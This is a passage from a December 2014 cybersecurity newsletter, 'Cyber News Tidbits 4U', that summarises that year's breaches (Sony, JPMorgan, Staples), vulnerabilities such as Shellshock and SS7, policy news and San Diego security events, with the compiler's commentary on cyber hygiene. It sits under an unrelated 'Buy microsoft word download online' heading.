Buy microsoft word download online

CYBER NEWS TIDBITS FOR U - DECEMBER 2014

Welcome to Cyber News Tidbits 4​U​ ! Here are updated news compilations from the Cyber Security Community Topic headers (+++): 1 – Security news you can likely use (re: management / opportunity items) 2 – Other items of general FYI / FYSA level interest 3 – Threats / bad news stuff / etc..  and… 4 – SD/SoCAL items of interest / opportunities   (send me your SD meetings!)  A couple of Highlights  (A couple of items of potentially notable interest / high utility &  value… your mileage will vary….) (Lots happening,  so LOTs to be aware of. Takes 5 min to skim…then pick out a topic or two..)  ( some great topics / meetings here in SD … scroll to bottom and get engaged)  +++  Some  highlights of the week ++ DEC 30 Since it’s New Year’s… got to have predictions… Cybersecurity hindsight and a look ahead at 2015 This year we witnessed a series of high-profile security breaches, from the aftermath of the Target and Home Depot fiascos, to a number of attacks on other national retailers,including Michaels, Goodwill and Neiman Marcus. Then there was the massive breach at JP Morgan Chase, which compromised personal information of more than 83 million households and businesses, and finally over 100 terabytes of internal files and films recently stolen from Sony. Nobody was safe in 2014. In addition to large retailers, media companies and financial institutions, technology companies like eBay and Snapchat were hacked, too, and so were government organizations and healthcare institutions. Also this year, massive Internet infrastructure vulnerabilities were discovered, including Shellshock, Heartbleed and POODLE. AND another – Proofpoint cybersecurity predictions for 2015 – Let’s just FIX what we know is broken!!     Top Data Breaches of 2014 – SONY is but ONE (and a call to cyber arms…) If the top breaches of 2014 taught the security world anything, it’s that size and sector don’t matter – all organizations are vulnerable. infographic looks at the top incidents and thelessons security leaders took away from them.   Lessons Learned from Data Breaches – BUT did we – really??? Timeline of cyber attacks and data breaches in 2014     Sony’s Wake Up Call for Cybersecurity  –  MAYBE??? How corporate executives may respond to the Sony Hack.  . if they actually get the gravity now…     Cyber and Privacy turmoil abounds… WHAT TO DO – the CISO Fundamentals All these hacks, leaks, breaches – more ‘admiring the problem / threat’ – spreading more “FUD” and not so much DOING cyber – so where are the affordable mitigation recommendations?    With breaches continuing to increase as well as cybercrime overall, thus financial and business loses increasing too, organizations need to take a more effective enterprise risk management approach to cyber security and protecting privacy.  So what are the ‘due diligence’ cyber steps needed, that we can afford? Gary and I developed a two-page “CISO Fundamentals” paper to help quantify what that entails. Take a quick peekand let us know what else you think is needed.     The first polymorphic ransomware emerges, spreads on its own – SCARY STUFF!! A new step in the evolution of ransomware has been documented by security researchers who discovered a sample that encrypts the files on the storage unit and creates unique instances of itself due to its polymorphic feature. This threat has been named VirRansom and VirLock by researchers from Sophos and ESET, respectively, in order to relay both its virus and desktop locking and ransomware sides. However, unlike the usual crypto-malware, this one allows decryption of the files, but it won’t stop locking the screen, thus forcing the victim to pay.     And the Winner for the Most Hacked Sector for 2014 is … Health and Medical How much does that cost???  Data Breach Cost Calculator     2014 is ending, but this wave of technology disruptions is just beginning Changes in technology are happening at a scale which was unimaginable before and will causedisruption in industry after industry. This has really begun to worry me, because we are not ready for this change and most of our leading companies won’t exist 15–20 years from now. Here are five sectors to keep an eye on     DARPA’s Autonomous Microdrones Designed to Enter Houses And you thought those pesky quad-copters were an invasion of privacy, a perfect terrorists tool…;-((     IoT & Marketing in 2015: 3 Ways Marketers Will Rethink Big Data     What 2015 Holds for Cybersecurity Stocks — HD, JPM, EBAY, SNE, CSCO         +++  Cyber Security News you can use  +++     Apple Issues First Automatic Update (what does this tell you… on several fronts!!!) Apple has pushed out its first automated update. The fix aims to address flaws in the Mac OS X network time protocol (NTP) segment. Apple has had the capability to push out fixes for several years, but this is the first time it has actually used the service. The vulnerability fixed in this patch lies in the NTP in OS X clocksystems.     Will CDM finally be ‘the realization of IT security’? For more than a decade, the federal government has been moving from a periodic, compliance-based approach to IT security to real-time awareness based on the continuous monitoring of IT systems and networks. While progress has been spotty so far, some security watchers say Phase 2 of the Homeland Security Department’s Continuous Diagnostics and Mitigation program, expected to be implemented in 2015, could be a major step forward. Jeff Wagner, director of security operations for the Office of Personnel Management, said Phase 2 could be “the realization of IT security.”     NSA Releases 12 Years Worth of Internal Reports US National Security Agency (NSA) made public 12 years worth of internal reports for the President’s Intelligence Oversight Board. Even so, the reports indicate that the NSA conducted illegal surveillance with mild or no consequences. The reports, which are heavily redacted, were released in responseto a Freedom of Information Act (FOIA) lawsuit brought by the American Civil Liberties Union (ACLU).     Cybersecurity Firm Identifies Six In Sony Hack One A Former employee – do you have a tight process to delete ALL the terminated employee’s access???     Security in 2015: Will you care about the next big breach?       Breaches should reignite push for better cyber hygiene  — YES!!! While it is debatable as to whether or not companies like USIS or Keypoint had sufficient internal cybersecurity controls in place to mitigate the breaches, what’s clear is that most contracting vehicles are outdated and ill-suited for the cyber challenges of today.     Congress is urged to make key decisions on commercial drones The Obama administration is on the verge of proposing long-awaited rules for commercial drone operations in U.S. skies, but key decisions on how much access to grant drones are likely to come from Congress next year        Insider Threats a Major Concern forBusinesses (this should be obvious to all by now)     NIST Cybersecurity Framework infographic… how it all integrates..     Snowden Documents Show How Well NSA Codebreakers Can Pry     Security and the Rise of Machine-to-Machine (M2M) Communications  (IoE & IoT)     10 Top Challenges Industrial IoT Must Overcome in 2015     2015 CISO Wish List and New Year Resolutions AND SO.. quit wishing for stuff and DO the CISO fundamentals!!!     Smartwatch Hacked, how to access data exchanged with Smartphone     ‘+ Farcing’ overtaking ‘phishing’ as online identity theft threat     Pew Research VCenter: The future of privacy – VERY IN-DEPTH review!!           +++  FYI / FYSA   +++     Sony hack: Is Congress next? Government agencies and congressional offices are vulnerable to the same kind of cyberattack that hit Sony Pictures, experts say. Lawmakers on Capitol Hill are well aware of the growing threat online, and many tell staff to act as if everything they write in email couldone day become public. “I try to inspire my staff often that when they write an email, they write it as if it should be right on the front page of your newspaper,” said Rep. Brad Sherman (D-Calif.), whose district includes Hollywood, in an interview with The Hill.     Obama signs 5 cybersecurity bills Without ceremony, President Obama on Dec. 18 signed five cybersecurity-related bills, including legislation to update the Federal Information Security Management Act, the law that governs federal government IT security. It’s the first time in 12 years that significant cybersecurity legislation has become law. The last major piece of cybersecurity law to be passed by Congress and signed by a president was the E-Government Act of 2002, which included FISMA.     German researchers discover a flaw that could let anyone listen to your cell calls German researchers have discovered security flaws that could let hackers, spies and criminals listen to private phone calls and intercept textmessages on a potentially massive scale – even when cellular networks are using the most advanced encryption now available. The flaws, to be reported at a hacker conference in Hamburg this month, are the latest evidence of widespread insecurity on SS7, the global network that allows the world’s cellular carriers to route calls, texts and other services to each other. Experts say it’s increasingly clear that SS7, first designed in the 1980s, is riddled with serious vulnerabilities that undermine the privacy of the world’s billions of cellular customers.     Attack on German Steel Factory System Caused “Massive Damage” Attackers breached security of a German steel mill’s network and caused considerable damage by manipulating the controls of a blast furnace. The attackers gained initial foothold in the network through a phishing email, and from there were able to make their way into the plant’s production network. The attack was disclosed in the annual report of the German FederalOffice for Information Security. [Note: Another bad example of weak reusable passwords used for very sensitive access. Many other security failures here, but the root cause of so many breaches traces back to the use of reusable passwords and the ease of compromise, whether via phishing or eavesdropping or keystroke capture malware….   This is a classic example of the air-gap mythology that endures in industrial control system environments.  Most companies in these historically non-technology based critical infrastructure industries continue to operate as if they don’t need to be concerned about cybersecurity when in fact they should be more concerned than the companies whose greatest fear is simply losing data.  And – they need to re-evaluate their architecture to ensure physical separation of IT and OT.]     FIRST LOOK at Australian Signals Directorate Cloud Computing Security for Tenants guidelines: In general, the Australian Cyber Security Center has put together a “CriticalSecurity Controls”-like look at the most important security processes to examine when considering a cloud service provider. There are several recommendations that are meaningful/doable and rightly prioritized (like “choose a CSP that has been assessed, yearly test incident response, protection authentication credentials, tokenize data, etc.). There is a sensible differentiation between what security issues are most relevant to Software as a Service vs. Infrastructure as a Service, etc. The CSP version is pretty much just the Tenant document with the syntax changed such that an auditor looks to see that the Tenant recommendations were followed.     Watchdog says Secret Services misses the bar on cybersecurity The Secret Service, no stranger to security lapses, is being dinged by an internal auditor for not requiring two-step verification to access agency networks and for ignoring government-wide rules for continuously monitoring network security. For the past year, the Department ofHomeland Security subdivision has refused to digitally report data about cyber defenses, according to a new inspector general report. DHS, which Congress last week designated the point-agency on cybersecurity, is in charge of the federal continuous monitoring initiative. The department’s inability to get its own agency to fall in line could raise questions about the enlargement of Homeland Security’s cyber authorities.     Chinese Android phone maker hides secret backdoor in its devices Chinese smartphone maker Coolpad has built an extensive “backdoor” into its Android devices that can track users, serve them unwanted advertisements and install unauthorized apps, a U.S. security firm alleged today. In a research paper released today, Palo Alto Networks detailed its investigation of the backdoor, which it dubbed “CoolReaper.” “Coolpad has built a backdoor that goes beyond the usual data collection,” said Ryan Olson, director of intelligence at Palo Alto’s Unit 42. “This is way beyondwhat one malicious insider could have done.”     China is reportedly blocking access to Gmail inside the country. China began blocking various Google services in 2009 and started blocking Gmail access earlier this year. Users have been seeking third party email clients to access their accounts, and now those have been blocked as well. The only way to access Gmail in China now is through virtual private networks (VPNs).     2014: The year cyber danger doubled As we look back at cyber topics in 2014, don’t be surprised if you are seeing double. This has been a year when cybersecurity stories doubled in breadth, depth and width of societal influence. As the Internet has expanded into every area of life, the opportunities have grown dramatically – but so have the challenges with the ‘dark side’ of the Internet.     Heartbleed, Shellshock, Tor and more: The 13 biggest security stories of 2014 The security of the web itself was tested in unprecedented ways in 2014–but the news isn’tall bad.     US Justice Dept. Establishes New Cyber Security A new unit operating under the US Department of Justice’s (DoJ’s) Computer Crime and Intellectual Property division will provide legal advice for cyber crime investigations worldwide. The unit will concentrate on proactive considerations to help reduce the likelihood of attacks.        ‘Data Integration for Dummies’  (eBook)     Making Security Measurable – Application Security Making Security Measurable – Software Assurance     8 ways mobile will get your attention in 2015     Hackers hit a poorly configured server to breach JPMorgan Weak hygiene and access control…   THE cause of 95% of all security incidents…;-(( So when will folks make this job one???     An ‘Hour of Code’? How About 5 Minutes for Security?     The Future of Cybersecurity Jobs       Tracking Moving Targets: Exploit Kits and CVEs     FBI: The Top 3 Ways Congress Could Help Fight Tenacious Cyber Threats Demarest suggested three ways Congresscould help evolve with cyber threats.         +++  THREATs  / bad news stuff / etc  +++     The Coolest Hacks Of 2014 TSA baggage scanners, evil USB sticks, and smart homes were among the targets in some of the most creative — and yes, scary — hacks this year by security researchers.  A weaponized PLC…. Cheating TSA’s carry-on baggage scanners… Hacking satellite ground terminals by air, sea, land…   Smart home devices not so savvy…   Crashing the vehicle traffic control system…  One bad-ass USB….    A worm in your NAS…     U.S. puts new focus on fortifying cyber defenses The Obama administration is increasingly concerned about a wave of digital extortion copycats in the aftermath of the cyberattack on Sony Pictures Entertainment, as the government and companies try to navigate unfamiliar territory to fortify defenses against further breaches. About 300 theaters on Thursday screened the movie that apparently triggered the hacking attack, a comedy about the assassination of NorthKorean leader Kim Jong Un, after Sony reversed its initial decision to acquiesce to hacker demands that the film be shelved.     For North Korea’s cyber army, long-term target may be telecoms, utility grids The hacking attack on Sony Pictures may have been a practice run for North Korea’s elite cyber-army in a long-term goal of being able to cripple telecoms and energy grids in rival nations, defectors from the isolated state said. Non-conventional capabilities like cyber-warfare and nuclear technology are the weapons of choice for the impoverished North to match its main enemies, they said. Obsessed by fears that it will be over-run by South Korea and the United States, North Korea has been working for years on the ability to disrupt or destroy computer systems that control vital public services such as telecoms and energy utilities, according to one defector.     Misfortune Cookie flaw puts 12 million routers at risk Researchers at the security software company Check Point saythey’ve discovered a serious vulnerability lurking inside the routers and modems used to deliver Internet connectivity to 12 million homes and small businesses around the world, and it’s going to be a complicated matter to fix it. Dubbed the Misfortune Cookie, the weakness is present in cable and DSL modems from well-known manufacturers like D-Link, Huawei and ZTE, and could allow a malicious hacker to hijack them and attack connected computers, phones and tablets. An attacker exploiting Misfortune Cookie could also monitor a vulnerable Internet connection, stealing passwords, business data or other information.     ICANN e-mail accounts, zone database breached in spearphishing attack Unknown attackers used a spearphishing campaign to compromise sensitive systems operated by the Internet Corporation for Assigned Names and Numbers (ICANN), a coup that allowed them to take control of employee e-mail accounts and access personal information of people doing business with the group.ICANN, which oversees the Internet’s address system, said in a release published Tuesday that the breach also gave attackers administrative access to all files stored in its centralized zone data system, as well as the names, postal addresses, e-mail addresses, fax and phone numbers, user names, and cryptographically hashed passwords of account holders who used the system.     Russian Group Stole Millions from Banks A cyber crime group has been targeting banks, payment systems, and retail companies in Russia and countries that were once part of the Soviet Union. Known as Anunak, the group stole funds, credit card data, and intellectual property. They stole from cash machine networks, which means the finds are being stolen from the banks and not customers’ accounts. In all, the group has stolen more than US $25 million.     Xbox Live, PlayStation Network Target of DDoS Attacks Last week, users found they were unable to log into the PlayStation Network and Xbox Live; Sony says theproblems were caused by distributed denial-of-service (DDoS) attacks. The trouble began on the evening of December 24. As of Sunday, December 28, the PlayStation network is back online. The FBI is reportedly investigating the attacks.     Security boot kits past present future (eBOOK) A history of these malware tools, and why might the future bring…     10 deadliest differences of state-sponsored attacks       +++   SD/SoCAL security events / opportunities ++   CyberTECH events / networking / startups / etc  —  THE cyber happening place in SD!!!  Join their Meetup Group for the latest event information!   The definition of “Cyber KEWEL”   Webster University’s  new SD cyber security program – check it out..     JAN   15 – OWASP – Running InfoSec for America’s Finest City..   Gary Hayslip, CISO for the city of San Diego,   15 – IoT Startup Table Breakfast   28 – International Data privacy day A – “Securing the IoT Privacy masters” by  CyberTECH, SOeC, others – all day event –  B –   Data Privacy Day–   NCSA and Morrison & Foerster LLP  – all day event –     30  – Cross Border cyber opportunities – MX/TJ and CA/SD collaboration event, all day Friday!!! (Hosted at Coleman University) – Contact me to join in…  introduction email and agenda at:     31 – “BigDataDay 4 SD”  all-day event SAT – free –   Jump in and help us – speak and make it great for all! WE went to the one in LA and it was great…   our three tracks will be: (1)  Technical =  Hadoop / Hbase / NoSQL; (2)  Data science = predictive analytics, parallel algorithms, statistical modeling, algorithms for data mining, etc and (3)  Applications =  key use cases…  Privacy by Design / data security,  data start-ups / incubators, novel products, Contact me to join in…  introduction email and agenda at:     FEB   8-11 – NDSS Symposium 2015   10-12 –  AFCEA West –  Focused on Operations in the Asia-Pacific Region       ++  Future events in planning  FYI:   25-26 Apr – CYBERWEST: The Southwest CybersecuritySummit (Phoenix AZ)   4-12 May SANS Security West 2015   18-21 Jul  Esri National Security summit     TBD  – Provided by IEEE Cyber SIG / Various Security groups – all day Privacy by design workshop – a cyber model & why you must be part of this initiative!  (at Coleman University –  AM Technical approach… PM public discussions)     Help move SD forward in cyber – DOING security vs admiring the problem…. SO engage and help out on cyber 4 PbD!!! ++  Join our PbD / data security meetup, stay tuned into what’s happened.. See our over Cyber for PbD brief at AND Our more detailed technical paper on our Cyber 4 PbD approach, including an executable, proposed open privacy framework within an enterprise architecture is at (this rough draft was  published in a major IEEE magazine this month): ———————————————————————————— DEC 21 YES, the SONY hack (security and IP disaster) is all over the news, with even the president getting engaged.  One might think this will motivate companies to finallyget serious on Cyber security… MAYBE.. a few links to that: Hackers’ threats prompt Sony Pictures to shelve Christmas release of ‘The Interview’ Sony Pictures Entertainment on Wednesday canceled the Christmas Day release of “The Interview,” bowing to threats of a wide-scale attack from hackers who U.S. intelligence officials have concluded were working for North Korea. U.S. officials, though, were not prepared to publicly accuse the reclusive government, in large part because the Obama administration has not determined what, if any, action it could take. Intelligence officials believe with “99 percent certainty” that hackers working for the North Korean government carried out the attack, Guardians of Peace claiming responsibility for the devastating hacking attack against Sony offered to selectively hold back on releasing email correspondence of its employees, provided that they write in and ask. Not everyone agrees that the Sony Pictures attack emanated from North Korea.Attribution for cyber attacks is difficult. Attackers can use proxies and phony IP addresses, and they can plant false clues inside the code of their malware. The initial attack appears to have been financially motivated. The film was not mentioned until later in the chain of events. How Much Will Scrapping ‘The Interview’ Cost Sony?  estimated $90 million financial hit     Some GREAT events in late January in SD.. With four all-day venues for national privacy day (2), big data / predictive analytics, and a very cool cross border cyber opportunities (see details at the end of the email)     The Top 10 Privacy Law Stories of 2014 From China to California to the EU; starring giants of the leisure industry, the tech industry and global governments, and encompassing battles over personal freedoms and government overreach-these are the Privacy Tracker stories that made sure nobody in privacy could nap on the job and     Cloud Predictions For 2015     Cisco sees a data analyticsfortune at the edge of the network     Agencies Mold Regulations around ‘Voluntary’ Cyber Standards      SANS 20 Critical Controls for Effective Cyber Defense Helper Kit  (EXCELLENT TOOL / spreadsheet!!!)  (note 10 MB)     One Simple Presentation Shows How Public Is Your Private Information     Top Treasury Official’s Speech Urges Adoption of Cyber Risk Insurance     Big Data Market Projected to Reach $76 Billion by 2020     U.S. Federal Cybersecurity Market Forecast 2015-2020 With a cumulative market valued at $65.5 billion (2015 – 2020), the U.S. Federal Cybersecurity market will grow steadily at about 6.2% CAGR     SIX technologies that will change PCs in 2015           +++  Cyber Security News you can use  +++     FireEye predictions for cybersecurity in 2015 Sony is still smarting over a cataclysmic cyberattack, US banks, Target and Staples have all been targeted, and it seems hackers are always one step ahead. But what can we expect from next year? Security flawsHeartbleed, Cryptolocker and Shellshock have all had their time in the media spotlight, companies are reviewing their risk management and damage control processes, and investment is being pumped into training the next generation of cybersecurity experts in an attempt to keep corporate network intrusion to a minimum. Mobile and Web-based viruses remain a scourge, and hardly a week goes by without hearing of another data breach or a new strain of malware being discovered in the wild. According to Greg Day, CTO of the EMEA region at security firm FireEye, these situations are likely to deepen and worsen over the coming year and into 2015.     Cyber-espionage expected to surge in 2015: McAfee Labs’ annual threats predictions report for the coming new year.   Annual Cybercrimes Report of 2014 – Stats & Top 15 Hack Cases   2014 in security: The biggest hacks, leaks, and data breaches   Employees Remain the Biggest Risk for Critical Data Loss   10 Top Information Security Threatsfor the Next Two Years   Expert Internet Security Predictions for 2015   2015 Predictions: The Year of Alternatives   Global Information Security Survey 2014 (infograph)     Apps, not malware, should be your biggest mobile concern Network security would be relatively simple if it weren’t for end users.  But just when IT staff are feeling like they are getting network security somewhat under control, employees and bosses alike are demanding access from a dizzying array mobile devices running on a variety of operating systems. NowSecure, until recently known as viaForensics, is taking an unusual two-pronged strategy to mobile security that focuses on enforcing security from the center while informing users about security risks at the end points of their mobile devices.     Hackers are getting personal information easier than before In the mobile app world, when hackers want access to personal information, they need simply ask. This is one of several key findings Symantec Corp.released today as part of the company’s “Mobile App Security” study. The study found that many are willing to forego privacy in exchange for free entertainment.     New York Financial Institutions Will be Evaluated on Cyber Security  (MORE will follow suit!!!) The Superintendent of New York’s Department of Financial Services has asked member organizations to consider cyber security “an integral aspect of their overall risk management strategy” instead of an issue for just information technology. Banks and other financial institutions in New York will be evaluated on their cyber security, including their use of multi-factor authentication and identity and access management. The requirements affect all financial institutions operating with a New York state charter or license.     Agencies Encourage Adoption of Cyber Security Standards Government agencies have begun encouraging industries that they oversee to adopt applicable cyber security guidelines from the US National Institute ofStandards and Technology (NIST). While the standards in the guidelines are voluntary, there is a possibility that they could become mandatory. NIST published the voluntary standards as part of the Framework for Improving Critical Infrastructure Cybersecurity.     Dude, Where’s My Security ROI? Great stab at quantifying cyber worth..  Yet the ALE… etc.. still have fuzzy math.. rare events with possibly huge impacts.. (rather like dividing by zero.  )… so the model must be explained to none technical folks..  And of course improving cyber hygiene and access control is essentially free..  Also. . Need to transfer risk.. cyber insurance..  might be a better buy..     IT Security is NOT Rocket Science He re-states many good points.  90+% of all security incidents are from lack of cyber hygiene and weak access control.. period!!!  All items you must do anyway.. thus little to no added cost.. Yet few DO the security basics..     The SONY cyber attack was a sophisticated operation sosophisticated, officials say, that the same attack could have made it through the defenses of almost any large organization, including the ones currently deployed by federal agencies   YET –  The malware used was unsophisticated and riddled with bugs. However, it did what it was supposed to do; the malware’s purpose did not require complex code. However, the malware’s construction indicates a familiarity with the Sony Pictures network.   Former NSA Insider: More Sony-Like Hacks A Given As Corporations Still Weak On Cybersecurity Sony hack: How cybercrime just got even more complicated   BitTorrent’s Offer To Sony: Release “The Interview” Safely Online With Us And Make Money   Breach insurance might not cover losses at Sony Pictures     This Little USB Necklace Hacks Your Computer In No Time Flat     DoD allows vetted commercial cloud services for sensitive unclassified data, updated guidance     CISO Assessment: For Security Leaders, a Stronger Voice     Cybersecurity &Cyber Defense Implementing the 20 Critical Controls on a Low-Cost Budget: Do It, Don’t Worry About It!     Demand for cyber security professionals higher than ever before :     NSA aurora gold spies on any wireless network, anywhere     Ready Technology Trends   Trends to Watch in 2015: From Algorithmic Accountability to the Uber of X         +++  FYI / FYSA   +++     NIST revises guide on security controls New guidance published by the National Institute of Standards and Technology is aimed at helping federal agencies and other organizations in and out of government assess proper security and privacy controls, especially those tied to the continuous monitoring of IT systems for vulnerabilities. NIST unveiled on Dec. 15 Special Publication 800-53A Revision 4, “Assessing Security and Privacy Controls in Federal Information Systems and Organizations,” which supplements SP 800-53 Rev 4, “Security and Privacy Controls for Federal Information Systems and Organizations,” publishedin April 2013.     Price tag rises for stolen identities sold in the underground One year after the cybercrime underground slashed the price of a stolen identity by as much as 37% due to a glut in the black market, the price tag for a pilfered ID has inched upward again. Researchers at Dell SecureWorks published their latest report on the underground hacker market today. Counterfeit identities are the new hot product to support fraud — new fake identity kits, passports, Social Security numbers, utility bills, and driver’s licenses. A new identity, including a working SSN, name, and address, goes for $250, and for an additional $100, you can get a utility bill for ID verification purposes when perpetrating fraud, the researchers found     Cybersecurity codes now attached to jobs government-wide Every position in the federal workforce now has a cybersecurity job code listed in its description for more effective tracking of the lagging cyber workforce, even if the job isn’tcybersecurity-related.     Cyberattacks longer, more continuous than before Companies hit with cyberattacks this year spent a longer time on average mitigating the threat than at any time previously, highlighting the growing sophistication and complexity of the threat landscape.     Real-life ‘Criminal Minds’ team tries to root out rogue federal employees The term ‘insider threat’ describes everything from government employees who snap on the job and commit violence to those who leak national secrets. But researchers say using technology to detect otherwise hidden behavioral patterns could help federal managers screen out mischief-makers of all stripes. Moreover, they could do so within the bounds of privacy.     Dutch Privacy Watchdog Hounds Google and Facebook The Dutch data protection authority College Bescherming Persoonsgegevens (CBP) has ordered Google to abide by that country’s privacy rules or be subject to penalties of as much as 15 million euros (US $18.4 million).Google has been using user data to offer targeted advertising. The watchdog group has also turned its attention to Facebook, launching an investigation into that company’s new privacy policy, which is scheduled to take effect on January 1, 2015.     2014 FISMA reduces paperwork, codifies management structure Agencies won’t have to complete huge three-year reports but will have to submit information on security incidents      Week to Weak: The Weaponization of Cyber Vulnerabilities     Schneier on Security: Over 700 Million People Taking Steps to Avoid NSA Surveillance     Hired Guns: The Consultants – The Chronicle of Higher Education – more opportunities     Is there a missing generation of cyber security professionals?     Most Organizations Don’t Properly Secure Sensitive Data, Report Finds     Top 5 Data Breaches of 2014   and why “Privacy PAYS”     Counting the real cost of cyber attacks     Worried About a Data Breach? Here’s How to Respond to the Threat     Data Breaches to Continue to Plague Healthcare in 2015     The Sleeping Giant: How Wearables Will Revolutionize Healthcare     Too Much Insider Access To Critical Data Is A Growing Risk     IBM: CISO’s outgunned in the cybercrime corral     Chief information security officers hard to find — and harder to keep       Infograph – Ponemon  Top Enterprise Threats to Data Security AND the actual Ponemon data security report and their web page on it.. data centric security  (DCS) eBook           +++  THREATs  / bad news stuff / etc  +++     Iran hackers may target U.S. energy, defense firms, FBI warns The Federal Bureau of Investigation has warned U.S. businesses to be on the alert for a sophisticated Iranian hacking operation whose targets include defense contractors, energy firms and educational institutions, according to a confidential agency document. The operation is the same as one flagged last week by cyber security firm Cylance Inc as targeting critical infrastructureorganizations worldwide, cyber security experts said. Cylance has said it uncovered more than 50 victims from what it dubbed Operation Cleaver, in 16 countries, including the United States.     China responsible for 85% of global phishing domains Chinese cyber-criminals are driving an uptick in malicious domain registration and account for the vast majority of the world’s phishing attacks, according to new stats from an industry body. Chinese phishers were responsible for a massive 85% of domains registered for the sole purpose of lifting user credentials and PII, and are the main cause of “historically high levels” of malicious domain and subdomain registrations, according to the Global Phishing Survey: Trends and Domain Name Use report from The Anti Phishing Working Group.     Worm exploits nasty Shellshock bug to commandeer network storage systems Criminal hackers are actively exploiting the critical shellshock vulnerability to install a self-replicating backdoor on a popularline of storage systems, researchers have warned     Nation-backed malware targets diplomats’ iPhones, Androids, and PCs Researchers have uncovered yet another international espionage campaign that’s so sophisticated and comprehensive that it could only have been developed with the backing of a well resourced country. Inception, as the malware is dubbed in a report published Tuesday by Blue Coat Labs, targets devices running Windows, Android, BlackBerry, and iOS     US Government Personnel Data May Have Been Compromised in Breach A breach at KeyPoint Government Solutions may have left personally identifiable information about nearly 50,000 US government employees exposed to possible theft. KeyPoint conducts federal employee background checks for security clearances. The Office of Personnel Management has notified people whose information may have been compromised. This is not the first time that a company providing background checks for government employees has suffered a breach.Earlier this year, a breach at USIS exposed personally identifiable information of 25,000 people.     Office supply chain Staples Inc. today finally acknowledged that a malware intrusion this year at some of its stores resulted in a credit card breach. The company now says some 119 stores were impacted between April and September 2014, and that as many as 1.16 million customer credit and debit cards may have been stolen as a result.     Serious NTP security holes have appeared and are being exploited A network time protocol security hole has been discovered and there are reports that exploits already exist for it and are being exploited.     TorrentLocker: Ransomware under the microscope     Selling Smartphone Security: Get Worried, Fast Striking a balance with mobile device security       +++   SD/SoCAL security events / opportunities ++   CyberTECH events / networking / startups / etc  —  THE cyber happening place in SD!!!  Join their Meetup Group for the latest eventinformation!   The definition of “Cyber KEWEL”     Webster University’s  new SD cyber security program – check it out..     JAN   15 – OWASP – Running InfoSec for America’s Finest City..   Gary Hayslip, CISO for the city of San Diego,   15 – IoT Startup Table Breakfast   28 – International Data privacy day A – “Securing the IoT Privacy masters” by  CyberTECH, SOeC, others – all day event –   B –   Data Privacy Day–   NCSA and Morrison & Foerster LLP  – all day event –     30  – Cross Border cyber opportunities – MX/TJ and CA/SD collaboration event, all day Friday!!! (Hosted at Coleman University) – Contact me to join in…  introduction email and agenda at:     31 – “BigDataDay 4 SD”  all-day event SAT – free –   Jump in and help us – speak and make it great for all! WE went to the one in LA and it was great…   our three tracks will be: (1)  Technical =  Hadoop / Hbase / NoSQL; (2)  Data science = predictive analytics, parallel algorithms, statistical modeling, algorithms for datamining, etc and (3)  Applications =  key use cases…  Privacy by Design / data security,  data start-ups / incubators, novel products, Contact me to join in…  introduction email and agenda at:     FEB   8-11 – NDSS Symposium 2015   10-12 –  AFCEA West –  Focused on Operations in the Asia-Pacific Region       ++  Future events in planning  FYI:   25-26 Apr – CYBERWEST: The Southwest Cybersecurity Summit   4-12 May SANS Security West 2015   18-21 Jul  Esri National Security summit     TBD  – Provided by IEEE Cyber SIG / Various Security groups – all day – – Privacy by design workshop – a cyber model & why you must be part of this initiative!  (at Coleman University –  AM Technical approach… PM public discussions)     Help move SD forward in cyber –  DOING security vs admiring the problem…. SO engage and help out on cyber 4 PbD!!! ++  Join our PbD / data security meetup, stay tuned into what’s happened.. See our over Cyber for PbD brief at AND Our more detailed technical paper on ourCyber 4 PbD approach, including an executable, proposed open privacy framework within an enterprise architecture is at (this rough draft was  published in a major IEEE magazine this month): ​—————————————————————————————————— DEC 7 Appeals Court to Hear Oral Arguments in Idaho Woman’s Case Against NSA Spying EFF, ACLU Support Smith in Fighting Mass Surveillance Before Ninth Circuit   Cyber security is one of six new industries of the future, Cyber security will excel at as long as it makes the necessary investment in its education and engineering base, the Institution of Engineering and Technology (IET) has argued in a new report. In addition to cyber security, Ones to Watch lists space, new power networks, 3D printing (‘additive manufacturing’), food security, and robotics as making up the half dozen industries in which the UK is already considered a world leader. The inclusion of cyber security among these might surprise some. Security is still seen in some quarters as ashort-term function, secondary to others and essentially a drain on the bottom line. The idea that it might be a competitive advantage in a world built on increasingly complex automated systems is only now starting to become apparent.     How to defend against a Sony hack So… the usual pitch.. okay..    Better tools… “multipart” authentication (yes…better access control! ) ..analytics. .. better Malware detection (a data deleting one here). . Insider threat detection. Etc..   Yes… all good…yet.. No mention of THE NO. ONE issue…10 times worse than the next worst thing *** poor cyber hygiene… causes 85+% of all security incidents… (just ask NMCI about that…:-(( And also use SCM / SIEM (monitor for bad behavior) and a little DLP too.. (how do you exfiltrate all those movies/data and not get noticed?) It is of course not about any one thing.. rather a risk prioritized, balanced and integrated, security posture. Continuing to sell one capability while dismissing others does a disserviceto all     Defense Industrial Base ISAC to Launch in February 2015 The Defense Industrial Base Information Sharing and Analysis Center (DIB-ISAC) is scheduled to open in February 2015. The center will allow member organizations to share information about threats and mitigations. The DIB-ISAC will be based in Huntsville, Alabama and will support chapters all over the US. Membership fees are based on the size of the company.     The Cybersecurity Myths That Small Companies Still Believe     GSA’s short list of emerging technologies An Alliant II RFI specifies 18 “Leading Edge Technologies” the agency is watching with interest.     New virtual assistant helps stop breaches: Personal information safeguard tool scheduled for rollout     CIOs and CISOs Can Learn From the Massive Sony Data Breach     Top Chinese hackers recruited for Google’s Project Zero team     ++ Join our PbD / data security meetup, stay tuned into what’s happened..     Good Morning, San Diego!   Niceaerial view of SD… quad-copter and go-pro camera         +++  Cyber Security News you can use  +++     _ Pro-Iranian hackers have penetrated some of the world’s most sensitive networks, A sustained cyber attack campaign dubbed Operation Cleaver has compromised computer networks at several high profile organizations, including governments and companies supporting elements of critical infrastructure, over the past two years. There are 50 known compromised targets in 16 countries worldwide and it is likely that there are many more that have not been detected. For more than two years … including those operated by a US-based airline, auto maker, natural gas producer, defense contractor, and military installation, security researchers said. In many cases, “Operation Cleaver,” as the sustained hacking campaign is being dubbed, has attained the highest levels of system access of targets located in 16 countries total, according to a report published Tuesday by security firm Cylance.Compromised systems in the ongoing attacks include Active Directory domain controllers that store employee login credentials, servers running Microsoft Windows and Linux, routers, switches, and virtual private networks. With more than 50 victims that include airports, hospitals, telecommunications providers, chemical companies, and governments, the Iranian-backed hackers are reported to have extraordinary control over much of the world’s critical infrastructure. For instance, among the targets is a company specializing in natural gas production, unclassified computers in the San Diego Navy Marine Corps Intranet (NMCI) and airlines and airports in Saudi Arabia, Pakistan and South Kore     Obama’s pick to lead the Pentagon is big on cybersecurity President Obama’s pick to lead the Pentagon, former deputy secretary of defense Ashton 